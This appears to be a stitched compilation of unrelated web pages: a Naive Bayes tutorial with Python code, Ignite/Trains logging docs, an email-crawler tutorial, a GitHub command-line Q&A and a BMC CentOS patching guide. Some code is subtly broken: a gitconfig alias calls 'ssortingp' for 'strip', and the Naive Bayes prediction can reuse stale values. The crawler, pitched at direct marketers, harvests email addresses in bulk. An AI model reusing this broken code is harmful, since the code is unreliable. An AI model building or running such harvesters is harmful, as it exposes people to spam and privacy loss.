During learning, the model learns a mechanism that maximizes $P(Y=c_k|X=x)$, which ensures that when the system receives an input sample $X=x$, it is most likely to give the correct classification $Y=c_k$.
Maximum likelihood or Bayesian estimation gives us $P(X=x|Y=c_k)$ and $P(Y=c_k)$; how, then, do we obtain $P(Y=c_k|X=x)$?
By Bayes' formula (Bayes' theorem), we have:
$$ \Large{P(Y=c_k|X=x)=\frac{P(X=x|Y=c_k)P(Y=c_k)}{\sum_kP(X=x|Y=c_k)P(Y=c_k)}} $$
We also know that any input sample can be represented as an n-dimensional vector, so the conditional probability distribution is:
$$ P(X=x|Y=c_k)=P(X^{(1)}=x^{(1)},...,X^{(n)}=x^{(n)}|Y=c_k),\ \ \ k=1,2,...,K $$
In the Naive Bayes method, a __conditional independence__ assumption is imposed on this conditional distribution, which gives:
$$ \begin{align} \large{P(X=x|Y=c_k)=P(X^{(1)}=}&\large{x^{(1)},...,X^{(n)}=x^{(n)}|Y=c_k)}\\ \large{=}&\large{\prod_{j=1}^nP(X^{(j)}=x^{(j)}|Y=c_k)} \end{align} $$
Therefore:
$$ \Large{P(Y=c_k|X=x)=\frac{P(Y=c_k)\prod _jP(X^{(j)}=x^{(j)}|Y=c_k)}{\sum_kP(Y=c_k)\prod_jP(X^{(j)}=x^{(j)}|Y=c_k)}} $$
Dropping the denominator, which is the same for every class, the Naive Bayes classifier can be written as:
$$ \Large{y=\arg \max_{c_k}P(Y=c_k)\prod _jP(X^{(j)}=x^{(j)}|Y=c_k)} $$
In other words, we find the $y=c_k$ that maximizes the expression above; that $y$ is the classifier's prediction.
Worked examples
The book gives two examples (estimation without parameter correction and with parameter correction, i.e. smoothing); both follow the same three-step routine.
Problem description:
Without parameter correction:
Step 1: class information
Step 2: per-class feature information
Step 3: per-class probability estimates
With parameter correction (Laplace smoothing):
Step 1: class information
Step 2: per-class feature information
Step 3: per-class probability estimates
Python implementation
import numpy as np
# Build the NB classifier
def Train(X_train, Y_train, feature):
global class_num,label
class_num = 2 # number of classes
label = [1, -1] # class labels
feature_len = 3 # number of rows in the feature table
# build the 3x2 table of feature values
feature = [[1, 'S'],
[2, 'M'],
[3, 'L']]
prior_probability = np.zeros(class_num) # initialize the prior probabilities
conditional_probability = np.zeros((class_num,feature_len,2)) # initialize the conditional probabilities
positive_count = 0 # count of positive samples
negative_count = 0 # count of negative samples
for i in range(len(Y_train)):
if Y_train[i] == 1:
positive_count += 1
else:
negative_count += 1
prior_probability[0] = positive_count / len(Y_train) # prior probability of the positive class
prior_probability[1] = negative_count / len(Y_train) # prior probability of the negative class
'''
conditional_probability is a 2*3*2 three-dimensional array: the first dimension indexes the class,
and the second and third dimensions form the 3*2 grid of feature values
'''
# loop over the two classes
for i in range(class_num):
# iterate over the rows of the feature table
for j in range(feature_len):
# iterate over the dataset and check each sample
for k in range(len(Y_train)):
if Y_train[k] == label[i]: # same class
if X_train[k][0] == feature[j][0]:
conditional_probability[i][j][0] += 1
if X_train[k][1] == feature[j][1]:
conditional_probability[i][j][1] += 1
class_label_num = [positive_count, negative_count] # sample counts for each class
for i in range(class_num):
for j in range(feature_len):
conditional_probability[i][j][0] = conditional_probability[i][j][0] / class_label_num[i] # conditional probability of the first feature value in row j given class i
conditional_probability[i][j][1] = conditional_probability[i][j][1] / class_label_num[i] # conditional probability of the second feature value in row j given class i
return prior_probability,conditional_probability
# classify a given sample
def Predict(testset, prior_probability, conditional_probability, feature):
result = np.zeros(len(label))
for i in range(class_num):
for j in range(len(feature)):
if feature[j][0] == testset[0]:
conditionalA = conditional_probability[i][j][0]
if feature[j][1] == testset[1]:
conditionalB = conditional_probability[i][j][1]
result[i] = conditionalA * conditionalB * prior_probability[i]
result = np.vstack([result,label])
return result
def main():
X_train = [[1, 'S'], [1, 'M'], [1, 'M'], [1, 'S'], [1, 'S'],
[2, 'S'], [2, 'M'], [2, 'M'], [2, 'L'], [2, 'L'],
[3, 'L'], [3, 'M'], [3, 'M'], [3, 'L'], [3, 'L']]
Y_train = [-1, -1, 1, 1, -1, -1, -1, 1, 1, 1, 1, 1, 1, 1, -1]
# build the 3x2 table of feature values
feature = [[1, 'S'],
[2, 'M'],
[3, 'L']]
testset = [2, 'S']
prior_probability, conditional_probability= Train(X_train, Y_train, feature)
result = Predict(testset, prior_probability, conditional_probability, feature)
print(result)
if __name__ == '__main__':
main()
Written by mmmwhy; last edited Sep 17, 2018 at 11:08 am.
|
PyTorch Ignite
Trains is now ClearML
This documentation applies to the legacy Trains versions. For the latest documentation, see ClearML.
To install Trains:
pip install trains
By default, Trains works with our demo Trains Server (https://demoapp.trains.allegro.ai/dashboard). You can deploy a self-hosted Trains Server, see the Deploying Trains Overview, and configure Trains to meet your requirements, see the Trains Configuration Reference page.
Ignite TrainsLogger
Integrate Trains by creating an Ignite TrainsLogger object. When the code runs, it connects to the Trains backend, and creates a Task (experiment) in Trains.
from ignite.contrib.handlers.trains_logger import *
trains_logger = TrainsLogger(project_name="examples", task_name="ignite")
Later in the code, attach any of the Trains handlers to the TrainsLogger object.
For example, attach the OutputHandler and log training loss at each iteration:
trains_logger.attach(trainer,
log_handler=OutputHandler(tag="training",
output_transform=lambda loss: {"loss": loss}),
event_name=Events.ITERATION_COMPLETED)
TrainsLogger parameters
The TrainsLogger method parameters are the following:
project_name (optional[str]) – The name of the project in which the experiment will be created. If the project does not exist, it is created. If project_name is None, the repository name becomes the project name.
task_name (optional[str]) – The name of the Task (experiment). If task_name is None, the Python experiment script's file name becomes the Task name.
task_type (optional[str]) – The type of the experiment. The default is training.
The task_type values include:
TaskTypes.training (default)
TaskTypes.train
TaskTypes.testing
TaskTypes.inference
report_freq (optional[int]) – The histogram processing frequency (handles histogram values every X calls to the handler). Affects GradsHistHandler and WeightsHistHandler. Default value is 100.
histogram_update_freq_multiplier (optional[int]) – The histogram report frequency (report first X histograms and once every X reports afterwards). Default value is 10.
histogram_granularity (optional[int]) – Histogram sampling granularity. Default is 50.
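For example (the parameter values here are illustrative only), a logger that thins out histogram reporting could be constructed as:
from ignite.contrib.handlers.trains_logger import TrainsLogger

trains_logger = TrainsLogger(
    project_name="examples",              # created if it does not already exist
    task_name="ignite",
    report_freq=100,                      # process histogram values every 100 handler calls
    histogram_update_freq_multiplier=10,
    histogram_granularity=50,
)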
Visualizing experiment results
After creating an Ignite TrainsLogger object and attaching handlers in trains_logger.py, when the code runs, you can visualize the experiment results in the Trains Web-App (UI).
Scalars
For example, run the Ignite MNIST example for TrainsLogger, mnist_with_trains_logger.py.
To log scalars, use OutputHandler.
trains_logger.attach(
trainer,
log_handler=OutputHandler(
tag="training", output_transform=lambda loss: {"batchloss": loss}, metric_names="all"
),
event_name=Events.ITERATION_COMPLETED(every=100),
)
trains_logger.attach(
train_evaluator,
log_handler=OutputHandler(tag="training", metric_names=["loss", "accuracy"],
another_engine=trainer),
event_name=Events.EPOCH_COMPLETED,
)
View the scalars in the Trains Web-App (UI), RESULTS tab, SCALARS sub-tab, view training and validation metrics.
trains_logger.attach(
validation_evaluator,
log_handler=OutputHandler(tag="validation", metric_names=["loss", "accuracy"],
another_engine=trainer),
event_name=Events.EPOCH_COMPLETED,
)
Model snapshots
To save model snapshots, use TrainsSaver.
handler = Checkpoint(
{"model": model},
TrainsSaver(trains_logger, dirname="~/.trains/cache/"),
n_saved=1,
score_function=lambda e: 123,
score_name="acc",
filename_prefix="best",
global_step_transform=global_step_from_engine(trainer),
)
View saved snapshots in the Trains Web-App (UI), ARTIFACTS tab.
To view the model, in the ARTIFACTS tab, click the model name (or download it).
Logging
Ignite engine output and / or metrics
To log the Ignite engine's output and / or metrics, use the OutputHandler handler.
For example, log training loss at each iteration.
# Attach the logger to the trainer to log training loss at each iteration
trains_logger.attach(trainer,
log_handler=OutputHandler(tag="training",
output_transform=lambda loss: {"loss": loss}),
event_name=Events.ITERATION_COMPLETED)
Log metrics for training.
# Attach the logger to the evaluator on the training dataset and log NLL, Accuracy metrics after each epoch
# We setup `global_step_transform=global_step_from_engine(trainer)` to take the epoch
# of the `trainer` instead of `train_evaluator`.
trains_logger.attach(train_evaluator,
log_handler=OutputHandler(tag="training",
metric_names=["nll", "accuracy"],
global_step_transform=global_step_from_engine(trainer)),
event_name=Events.EPOCH_COMPLETED)
Log metrics for validation.
# Attach the logger to the evaluator on the validation dataset and log NLL, Accuracy metrics after
# each epoch. We setup `global_step_transform=global_step_from_engine(trainer)` to take the epoch of the
# `trainer` instead of `evaluator`.
trains_logger.attach(evaluator,
log_handler=OutputHandler(tag="validation",
metric_names=["nll", "accuracy"],
global_step_transform=global_step_from_engine(trainer)),
event_name=Events.EPOCH_COMPLETED)
Optimizer parameters
To log optimizer parameters, use the OptimizerParamsHandler handler.
# Attach the logger to the trainer to log optimizer's parameters, e.g. learning rate at each iteration
trains_logger.attach(trainer,
log_handler=OptimizerParamsHandler(optimizer),
event_name=Events.ITERATION_STARTED)
Model weights
To log model weights as scalars, use the WeightsScalarHandler handler.
# Attach the logger to the trainer to log model's weights norm after each iteration
trains_logger.attach(trainer,
log_handler=WeightsScalarHandler(model, reduction=torch.norm),
event_name=Events.ITERATION_COMPLETED)
To log model weights as histograms, use the WeightsHistHandler handler.
# Attach the logger to the trainer to log model's weights norm after each iteration
trains_logger.attach(trainer,
log_handler=WeightsHistHandler(model),
event_name=Events.ITERATION_COMPLETED)
Model snapshots
To save input snapshots as Trains artifacts, use TrainsSaver.
to_save = {"model": model}
handler = Checkpoint(to_save, TrainsSaver(trains_logger), n_saved=1,
score_function=lambda e: 123, score_name="acc",
filename_prefix="best",
global_step_transform=global_step_from_engine(trainer))
validation_evaluator.add_event_handler(Events.EVENT_COMPLETED, handler)
MNIST example
The ignite repository contains an MNIST TrainsLogger example, mnist_with_trains_logger.py.
When you run this code, visualize the experiment results in the Trains Web-App (UI), see Visualizing experiment results.
|
I often receive requests asking about email crawling. It is evident that this topic is quite interesting for those who want to scrape contact information from the web (like direct marketers), and previously we have already mentioned GSA Email Spider as an off-the-shelf solution for email crawling. In this article I want to demonstrate how easy it is to build a simple email crawler in Python. This crawler is simple, but you can learn many things from this example (especially if you’re new to scraping in Python).
I purposely simplified the code as much as possible to distill the main idea and allow you to add any additional features by yourself later if necessary. However, despite its simplicity, the code is fully functional and is able to extract for you many emails from the web. Note also that this code is written on Python 3.
Ok, let’s move from words to deeds. I’ll consider it portion by portion, commenting on what’s going on. If you need the whole code you can get it at the bottom of the post.
Jump to the full-code.
Let’s import all necessary libraries first. In this example I use BeautifulSoup and Requests as third party libraries and urllib, collections and re as built-in libraries. BeautifulSoup provides a simple way for searching an HTML document, and the Request library allows you to easily perform web requests.
from bs4 import BeautifulSoup
import requests
import requests.exceptions
from urllib.parse import urlsplit
from collections import deque
import re
The following piece of code defines a list of urls to start the crawling from. For an example I chose “The Moscow Times” website, since it exposes a nice list of emails. You can add any number of urls that you want to start the scraping from. Though this collection could be a list (in Python terms), I chose a deque type, since it better fits the way we will use it:
# a queue of urls to be crawled
new_urls = deque(['http://www.themoscowtimes.com/contact_us/'])
Next, we need to store the processed urls somewhere so as not to process them twice. I chose a set type, since we need to keep unique values and be able to search among them:
# a set of urls that we have already crawled
processed_urls = set()
In the emails collection we will keep the collected email addresses:
# a set of crawled emails
emails = set()
Let’s start scraping. We’ll do it until we don’t have any urls left in the queue. As soon as we take a url out of the queue, we will add it to the list of processed urls, so that we do not forget about it in the future:
# process urls one by one until we exhaust the queue
while len(new_urls):
# move next url from the queue to the set of processed urls
url = new_urls.popleft()
processed_urls.add(url)
Then we need to extract some base parts of the current url; this is necessary for converting relative links found in the document into absolute ones:
# extract base url and path to resolve relative links
parts = urlsplit(url)
base_url = "{0.scheme}://{0.netloc}".format(parts)
path = url[:url.rfind('/')+1] if '/' in parts.path else url
The following code gets the page content from the web. If it encounters an error it simply goes to the next page:
# get url's content
print("Processing %s" % url)
try:
response = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError):
# ignore pages with errors
continue
When we have gotten the page, we can search for all new emails on it and add them to our set. For email extraction I use a simple regular expression for matching email addresses:
# extract all email addresses and add them into the resulting set
new_emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", response.text, re.I))
emails.update(new_emails)
After we have processed the current page, let’s find links to other pages and add them to our url queue (this is what the crawling is about). Here I use the BeautifulSoup library for parsing the page’s html:
# create a beutiful soup for the html document
soup = BeautifulSoup(response.text)
The find_all method of this library extracts page elements according to the tag name (<a> in our case):
# find and process all the anchors in the document
for anchor in soup.find_all("a"):
Some of <a> tags may not contain a link at all, so we need to take this into consideration:
# extract link url from the anchor
link = anchor.attrs["href"] if "href" in anchor.attrs else ''
If the link address starts with a slash, then we count it as a relative link, and it is necessary to add the base url to the beginning of it:
# add base url to relative links
if link.startswith('/'):
link = base_url + link
Now, if we have gotten a valid link (starting with “http”) and we don’t have it in our url queue, and we haven’t processed it before, then we can add it to the queue for further processing:
# add the new url to the queue if it's of HTTP protocol, not enqueued and not processed yet
if link.startswith('http') and not link in new_urls and not link in processed_urls:
new_urls.append(link)
A Simple Email Crawler (full code)
from bs4 import BeautifulSoup
import requests
import requests.exceptions
from urllib.parse import urlsplit
from collections import deque
import re
# a queue of urls to be crawled
new_urls = deque(['http://www.themoscowtimes.com/contact_us/index.php'])
# a set of urls that we have already crawled
processed_urls = set()
# a set of crawled emails
emails = set()
# process urls one by one until we exhaust the queue
while len(new_urls):
# move next url from the queue to the set of processed urls
url = new_urls.popleft()
processed_urls.add(url)
# extract base url to resolve relative links
parts = urlsplit(url)
base_url = "{0.scheme}://{0.netloc}".format(parts)
path = url[:url.rfind('/')+1] if '/' in parts.path else url
# get url's content
print("Processing %s" % url)
try:
response = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError):
# ignore pages with errors
continue
# extract all email addresses and add them into the resulting set
new_emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", response.text, re.I))
emails.update(new_emails)
# create a beutiful soup for the html document
soup = BeautifulSoup(response.text)
# find and process all the anchors in the document
for anchor in soup.find_all("a"):
# extract link url from the anchor
link = anchor.attrs["href"] if "href" in anchor.attrs else ''
# resolve relative links
if link.startswith('/'):
link = base_url + link
elif not link.startswith('http'):
link = path + link
# add the new url to the queue if it was not enqueued nor processed yet
if not link in new_urls and not link in processed_urls:
new_urls.append(link)
This crawler is simple and is deficient in several features (like saving found emails into a file), but it gives you some basic principles of email crawling. I give it to you for further improvement.
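For instance, one of the missing features mentioned above, saving the found emails into a file, only takes a few extra lines (a minimal sketch; the output file name is arbitrary):
# after the crawl loop finishes, dump the collected addresses to a text file
with open("emails.txt", "w") as out_file:
    for email in sorted(emails):
        out_file.write(email + "\n")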
For how to work with sessions, cookies and auth tokens in the requests library in Python, please refer to here.
And of course, if you have any questions, suggestions or corrections feel free to comment on this post below.
Have a nice day!
|
J’ai créé un nouveau référentiel Git local:
~$ mkdir projectname ~$ cd projectname ~$ git init ~$ touch file1 ~$ git add file1 ~$ git commit -m 'first commit'
Is there a git command to create a new remote repository and push my commit to GitHub from here? I know it's no big deal to fire up a browser and create a new repository, but if there is a way to do this from the CLI, I would be delighted.
I have read a large number of articles, but none of the ones I found mention how to create a remote repository from the command-line interface using git commands. Tim Lucas's nice article Setting up a new remote git repository is the closest thing I found, but GitHub does not provide shell access.
You can create a GitHub repo via the command line using the GitHub API. Check out the repository API. If you scroll down about a third of the way, you'll see a section titled "Create" that explains how to create a repo through the API (just above it there is a section that explains how to use a repo with the API). Obviously you can't use git for this, but you can do it from the command line with a tool such as curl.
Outside of the API, there is no way to create a repository on GitHub from the command line. As you noted, GitHub does not allow shell access, etc. Besides the GitHub API, GitHub's web interface is the only way to create a repository.
CLI commands for GitHub API v3 (replace all CAPS keywords):
curl -u 'USER' https://api.github.com/user/repos -d '{"name":"REPO"}'
# Remember replace USER with your username and REPO with your repository/application name!
git remote add origin git@github.com:USER/REPO.git
git push origin master
This can be done with three commands:
curl -u 'nyeates' https://api.github.com/user/repos -d '{"name":"projectname","description":"This project is a test"}'
git remote add origin git@github.com:nyeates/projectname.git
git push origin master
(updated for GitHub API v3)
curl -u 'nyeates' https://api.github.com/user/repos -d '{"name":"projectname","description":"This project is a test"}'
git remote add origin git@github.com:nyeates/projectname.git
git push origin master
If you install defunkt's excellent Hub tool, it becomes as easy as
git create
In the author's words, "hub is a command-line wrapper for git that makes you better at GitHub."
Simple steps (using git + hub => GitHub):
Install hub (GitHub).
brew install hub
go get github.com/github/hub
otherwise (this also requires Go):
git clone https://github.com/github/hub.git && cd hub && ./script/build
Go to your repository, or create an empty one: mkdir foo && cd foo && git init
Run: hub create; it will ask for your GitHub credentials the first time.
Usage: hub create [-p] [-d DESCRIPTION] [-h HOMEPAGE] [NAME]
Example: hub create -d Description -h example.com org_name/foo_repo
Hub will ask for your GitHub username and password the first time it needs to access the API, and exchange them for an OAuth token, which it saves in ~/.config/hub.
To explicitly name the new repository, pass NAME, optionally in the form ORGANIZATION/NAME to create it under an organization you are a member of.
With -p, create a private repository; with -d and -h, set the repository description and homepage URL respectively.
To avoid being prompted, use the GITHUB_USER and GITHUB_PASSWORD environment variables.
Then commit and push as usual, or check out hub commit / hub push.
For more help, run: hub help.
See also: Importing a Git repository using GitHub's command line.
There is an official GitHub gem which, I think, does this. I'll try to add more information as I learn, but I'm only just discovering this gem, so I don't know much yet.
UPDATE: After setting up my API key, I am able to create a new repository on GitHub via the create command, but I can't use the create-from-local command, which is supposed to take the current local repo and create a corresponding remote one on GitHub.
$ gh create-from-local => error creating repository
If anyone has any ideas about this, I'd love to know what I'm doing wrong. There is already an issue filed.
UPDATE: I eventually got this working. I'm not sure exactly how to reproduce the problem, but I just started from scratch (deleted the .git folder)
git init
git add .emacs
git commit -a -m "adding emacs"
Now this line will create the remote repo and even push to it, but unfortunately I don't think I can specify the repo name I'd like. I wanted it to be called "dotfiles" on GitHub, but the gem just used the name of the current folder, which was "jason" since I was in my home folder. (I filed a ticket asking for the desired behavior)
gh create-from-local
This command, on the other hand, does accept an argument to specify the name of the remote repository, but it is intended for starting a new project from scratch; that is, after calling this command you get a new remote repository tracking a newly created subfolder relative to your current position, both with the name specified as the argument.
gh create dotfiles
It is tedious to type out the full code every time a repository needs to be created.
curl -u 'USER' https://api.github.com/user/repos -d '{"name":"REPO"}'
git remote add origin git@github.com:USER/REPO.git
git push origin master
A simpler approach is:
githubscript.sh
#!/bin/bash
curl -u 'YOUR_GITHUB_USER_NAME' https://api.github.com/user/repos -d "{\"name\":\"$1\"}";
git init;
git remote add origin git@github.com:YOUR_GITHUB_USER_NAME/$1.git;
NB: Here, $1 is the repository name passed as an argument when calling the script. Change
YOUR_GITHUB_USER_NAME before saving the script.
Set the required permissions on the script file: chmod 755 githubscript.sh
Include the scripts directory in your environment configuration file: nano ~/.profile; export PATH="$PATH:$HOME/Desktop/my_scripts"
Also define an alias to run the githubscript.sh file: nano ~/.bashrc; alias githubrepo="bash githubscript.sh"
Now reload .bashrc and .profile in the terminal: source ~/.bashrc ~/.profile;
Now, to create a new repository, say demo: githubrepo demo;
For users with two-factor authentication, you can use bennedich's solution, but you just need to add the X-GitHub-OTP header to the first command. Replace CODE with the code provided by your two-factor authentication provider. Replace USER and REPO with the username and repository name, as you would in his solution.
curl -u 'USER' -H "X-GitHub-OTP: CODE" -d '{"name":"REPO"}' https://api.github.com/user/repos git remote add origin git@github.com:USER/REPO.git git push origin master
I wrote a nifty script for this called Gitter, using the REST APIs for GitHub and BitBucket:
BitBucket:
gitter -c -rb -l javascript -n node_app
GitHub:
gitter -c -rg -l javascript -n node_app
-c = create a new repository
-r = repository provider (g = GitHub, b = BitBucket)
-n = name the repo
-l = (optional) sets the application language in the repository
I created a Git alias to do this, based on Bennedich's answer. Add the following to your ~/.gitconfig:
[github] user = "your_github_username" [alias] ; Creates a new Github repo under the account specified by github.user. ; The remote repo name is taken from the local repo's directory name. ; Note: Referring to the current directory works because Git executes "!" shell commands in the repo root directory. hub-new-repo = "!python3 -c 'from subprocess import *; import os; from os.path import *; user = check_output([\"git\", \"config\", \"--get\", \"github.user\"]).decode(\"utf8\").ssortingp(); repo = splitext(basename(os.getcwd()))[0]; check_call([\"curl\", \"-u\", user, \"https://api.github.com/user/repos\", \"-d\", \"{{\\\"name\\\": \\\"{0}\\\"}}\".format(repo), \"--fail\"]); check_call([\"git\", \"remote\", \"add\", \"origin\", \"git@github.com:{0}/{1}.git\".format(user, repo)]); check_call([\"git\", \"push\", \"origin\", \"master\"])'"
To use it, run
$ git hub-new-repo
from anywhere within the local repository, and enter your GitHub password when prompted.
Based on @Mechanical Snail's other answer, except without using Python, which I found extremely overkill. Add this to your ~/.gitconfig:
[github] user = "your-name-here" [alias] hub-new-repo = "!REPO=$(basename $PWD) GHUSER=$(git config --get github.user); curl -u $GHUSER https://api.github.com/user/repos -d {\\\"name\\\":\\\"$REPO\\\"} --fail; git remote add origin git@github.com:$GHUSER/$REPO.git; git push origin master"
No, you have to open a browser at least once to create your username on GitHub. Once it is created, you can use the GitHub API to create repositories from the command line, with the following command:
curl -u 'github-username' https://api.github.com/user/repos -d '{"name":"repo-name"}'
For example:
curl -u 'arpitaggarwal' https://api.github.com/user/repos -d '{"name":"command-line-repo"}'
To learn how to create a token, click here. Here is the command you will enter (as of the date of this answer; replace all CAPS keywords):
curl -u 'YOUR_USERNAME' -d '{"scopes":["repo"],"note":"YOUR_NOTE"}' https://api.github.com/authorizations
Once you enter your password, you will see the following, which contains your token.
{ "app": { "name": "YOUR_NOTE (API)", "url": "http://developer.github.com/v3/oauth/#oauth-authorizations-api" }, "note_url": null, "note": "YOUR_NOTE", "scopes": [ "repo" ], "created_at": "2012-10-04T14:17:20Z", "token": "xxxxx", "updated_at": "2012-10-04T14:17:20Z", "id": xxxxx, "url": "https://api.github.com/authorizations/697577" }
You can revoke your token at any time by going here.
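If you prefer to make that API call from Python rather than curl, the token can be sent in the Authorization header; a small sketch (YOUR_TOKEN and REPO_NAME are placeholders, not values from this answer):
import requests

# create a repository using the OAuth token obtained above (placeholder values)
response = requests.post(
    "https://api.github.com/user/repos",
    headers={"Authorization": "token YOUR_TOKEN"},
    json={"name": "REPO_NAME"},
)
print(response.status_code, response.json().get("full_name"))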
What you need is hub. Hub is a command-line wrapper for git. It was designed to integrate with native git using aliases. It tries to provide GitHub actions within git, including creating a new repository.
→ create a repo for a new project
$ git init
$ git add . && git commit -m "It begins."
$ git create -d "My new thing"
→ (creates a new project on GitHub with the name of current directory)
$ git push origin master
For Rubyists:
gem install githubrepo
githubrepo create *reponame*
enter your username and password at the prompt
git remote add origin *ctrl v*
git push origin master
Source: Elikem Adadevoh
For reputation reasons I can't add this as a comment (where it would be better placed, as a reply to bennedich's answer), but for the Windows command line, here is the correct syntax:
curl -u YOUR_USERNAME https://api.github.com/user/repos -d "{\"name\": \"YOUR_REPO_NAME\"}"
It's the same basic form, but you have to use double quotes (") instead of single ones, and escape the double quotes in the POST parameters (after the -d flag). I also removed the single quotes around my username, but if your username had a space in it (is that even possible?) it would probably need double quotes.
For all Python 2.7.* users: there is a Python wrapper around the GitHub API (currently on version 3) called GitPython. Just install it using easy_install PyGithub or pip install PyGithub.
from github import Github
g = Github(your-email-addr, your-passwd)
repo = g.get_user().create_repo("your-new-repos-name")
# Make use of Repository object (repo)
The Repository object docs are here.
I found this solution, which I liked: https://medium.com/@jakehasler/how-to-create-a-remote-git-repo-from-the-command-line-2d6857f49564
You first need to create a GitHub personal access token.
Open your ~/.bash_profile or ~/.bashrc file in your favorite text editor. Add the following line near the top of the file, where the rest of your export variables are:
export GITHUB_API_TOKEN=
Somewhere below, next to your other bash functions, you can paste something similar to the following:
function new-git() {
    curl -X POST https://api.github.com/user/repos -u :$GITHUB_API_TOKEN -d '{"name":"'$1'"}'
}
Now, whenever you create a new project, you can run the command $ new-git awesome-repo to create a new public remote repository on your GitHub user account.
Disclaimer: I am the author of the open-source project.
This functionality is provided by: https://github.com/chrissound/LinuxVerboseCommandLib and is essentially this script:
#!/usr/bin/env bash
# Create a repo named by the current directory
# Accepts 1 STRING parameter for the repo description
# Depends on bin: jq
# Depends on env: GITHUB_USER, GITHUB_API_TOKEN
github_createRepo() {
  projName="$(basename "$PWD")"
  json=$(jq -n \
    --arg name "$projName" \
    --arg description "$1" \
    '{"name":$name, "description":$description}')
  curl -u "$GITHUB_USER":"$GITHUB_API_TOKEN" https://api.github.com/user/repos -d "$json"
  git init
  git remote add origin git@github.com:"$GITHUB_USER"/"$projName".git
  git push origin master
};
here are my initial git commands (this possibly takes place in C:/Documents and Settings/your_username/):
mkdir ~/Hello-World    # Creates a directory for your project called "Hello-World" in your user directory
cd ~/Hello-World       # Changes the current working directory to your newly created directory
touch blabla.html      # create a file, named blabla.html
git init               # Sets up the necessary Git files
git add blabla.html    # Stages your blabla.html file, adding it to the list of files to be committed
git commit -m 'first committttt'    # Commits your files, adding the message
git remote add origin https://github.com/username/Hello-World.git    # Creates a remote named "origin" pointing at your GitHub repository
git push -u origin master    # Sends your commits in the "master" branch to GitHub
I recently discovered create-github-repo. From the readme:
Install:
$ npm i -g create-github-repo
Usage:
$ export CREATE_GITHUB_REPO_TOKEN=
$ create-github-repo --name "My coolest repo yet!"
Or:
$ create-github-repo --name "My coolest repo yet!"
create a new repository on the command line
echo "# " >> README.md git init git add README.md git commit -m "first commit" git remote add origin https://github.com/**/**.git git push -u origin master
push an existing repository from the command line
git remote add origin https://github.com/**/**.git
git push -u origin master
|
How to get the VPC to recognize non supported RPM-based Distros
Contributor content
This topic was created by a BMC Contributor and has not been approved. More information.
This has been tested in the 7.6.0 VPC and tested on later application server versions. In 8.x the VPC has been removed for Linux patching, as RedHat, SLES and OEL support was rolled into the product as Patch Catalogs. However, these catalogs are inflexible and will not work with distros like CentOS, Fedora, OpenSUSE or any other RPM-based distro. While these distros are typically unsupported by the RSCD agent, the agent typically functions OK.
The examples below cover modifying the VPC for CentOS, but a similar procedure should work for other distros.
This is completely unsupported by BMC. It is recommended that you make backups of any files that you are making changes to and systems that you are going to test this on. You may not be able to get this to work.
Overview
We need to do two main things here. We need to tell the VPC how to identify the distro (CentOS), and we need to tell the VPC how to get the version or release of the distro. Luckily, this information is stored in a text file that is consistent for each distro. This is how the VPC figures out that RHEL is RHEL and SuSE is SuSE. For 8.x application servers we need to install the VPC and then add the Linux VPC bits back, and they will use the common VPC framework that the VPC Installer lays down.
Install the VPC
On 7.6 install the VPC and the latest VPC patch normally. You must install the perl-XML-Parser module on the application server and the RedHat helper system (where the repo is kept). Also, java must be installed on your helper system. The openjdk that ships with RHEL 5 is fine.
8.x VPC
Installation
On 8.x, install the VPC and choose 'HP-UX'. Let the installer finish.
Apply the latest VPC patch.
Grab the 7.6 VPC and 7.6 VPC hotfixes.
In the patch-content directory, unzip the patchanalysis.zip file.
Copy the linuxpu directory to the 8.x VPC install path, e.g. /opt/bmc/BladeLogic/8.1/NSH/patch
Unzip the 7.6 VPC Hotfix into a temporary directory. Copy any files in the linuxpu directory to the 8.x VPC install path (overwriting what you just extracted from the 7.6 VPC)
Copy the SupportFiles/RedHatRepositoryManager.zip file to the SupportFiles directory in the install path, e.g. /opt/bmc/BladeLogic/8.1/NSH/patch/SupportFiles
On UNIX, run the command chown -R bladmin:bladmin /opt/bmc/BladeLogic/8.0/NSH/patch/linuxpu
8.x VPC File Modifications
Comment out any lines in the following files that contain blcli.setAuthenticationType("BLSSO"), jli.setAuthenticationType("BLSSO"), jli.setAppServerHost(appserver), or blcli.setAppServerHost(hostname):
linuxpu/Scripts/Jython/linux-analysis.py
linuxpu/Scripts/Jython/get_blds_path.py
linuxpu/Scripts/Jython/loadAndDeployPatches.jli
In 8.1 and beyond, update the java class paths that are referenced in the following files:
linuxpu/Scripts/Jython/solpatch.py
linuxpu/Scripts/Jython/sharedPayload.py
linuxpu/Scripts/Jython/linux-analysis.py
For example, we find com.bladelogic.shared.comm in linuxpu/Scripts/Jython/solpatch.jy. We need to change that to com.bladelogic.om.infra.shared.comm. Insert om.infra after any occurrence of com.bladelogic.
Change the bl_yum="/opt/bladelogic/blyum" line in linuxpu/Work/linux-analyze.sh and linuxpu/Work/linux-deploy.sh to:
bl_yum="`cat /usr/lib/rsc/HOME`/bin/blyum"
Common File Modifications
There are 3 files to modify here:
<OM>/patch/linuxpu/Scripts/Perl/linuxpc.pl
<OM>/patch/linuxpu/Scripts/Jython/linux-analysis.py
<OM>/patch/linuxpu/Work/linux-analyze.sh
linuxpc.pl
In the linuxpc.pl file find the section around line 700 that looks like:
if ( !( system_cmd("nexec $host 'sh -c \"test -f $redhat_relfile\"'") ) )
{
$os_vendor = "redhat";
$os_rel_file = $redhat_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"test -f $suse_relfile\"'") ) )
{
$os_vendor = "suse";
$os_rel_file=$suse_relfile;
}
We need to tell the VPC how to figure out that this is CentOS. This can be done with an nexec to look for a particular RPM that should only exist on a CentOS system. The new section looks like:
if ( !( system_cmd("nexec $host 'sh -c \"test -f $redhat_relfile\"'") ) )
{
$os_vendor = "redhat";
$os_rel_file = $redhat_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"test -f $suse_relfile\"'") ) )
{
$os_vendor = "suse";
$os_rel_file=$suse_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"rpm -q centos-release\"'") ) )
{
$os_vendor = "cent";
$os_rel_file=$redhat_relfile;
}
Next we need to tell the VPC how to figure out the release of CentOS. Around line 720 there is a section that reads the version out of the /etc/redhat-release file. The CentOS file is in a different order than RedHat so we need to pull the release number from a different location in the line. The original section looks like this:
my @a = split( " ", $os_relstring );
if($os_vendor eq "redhat"){
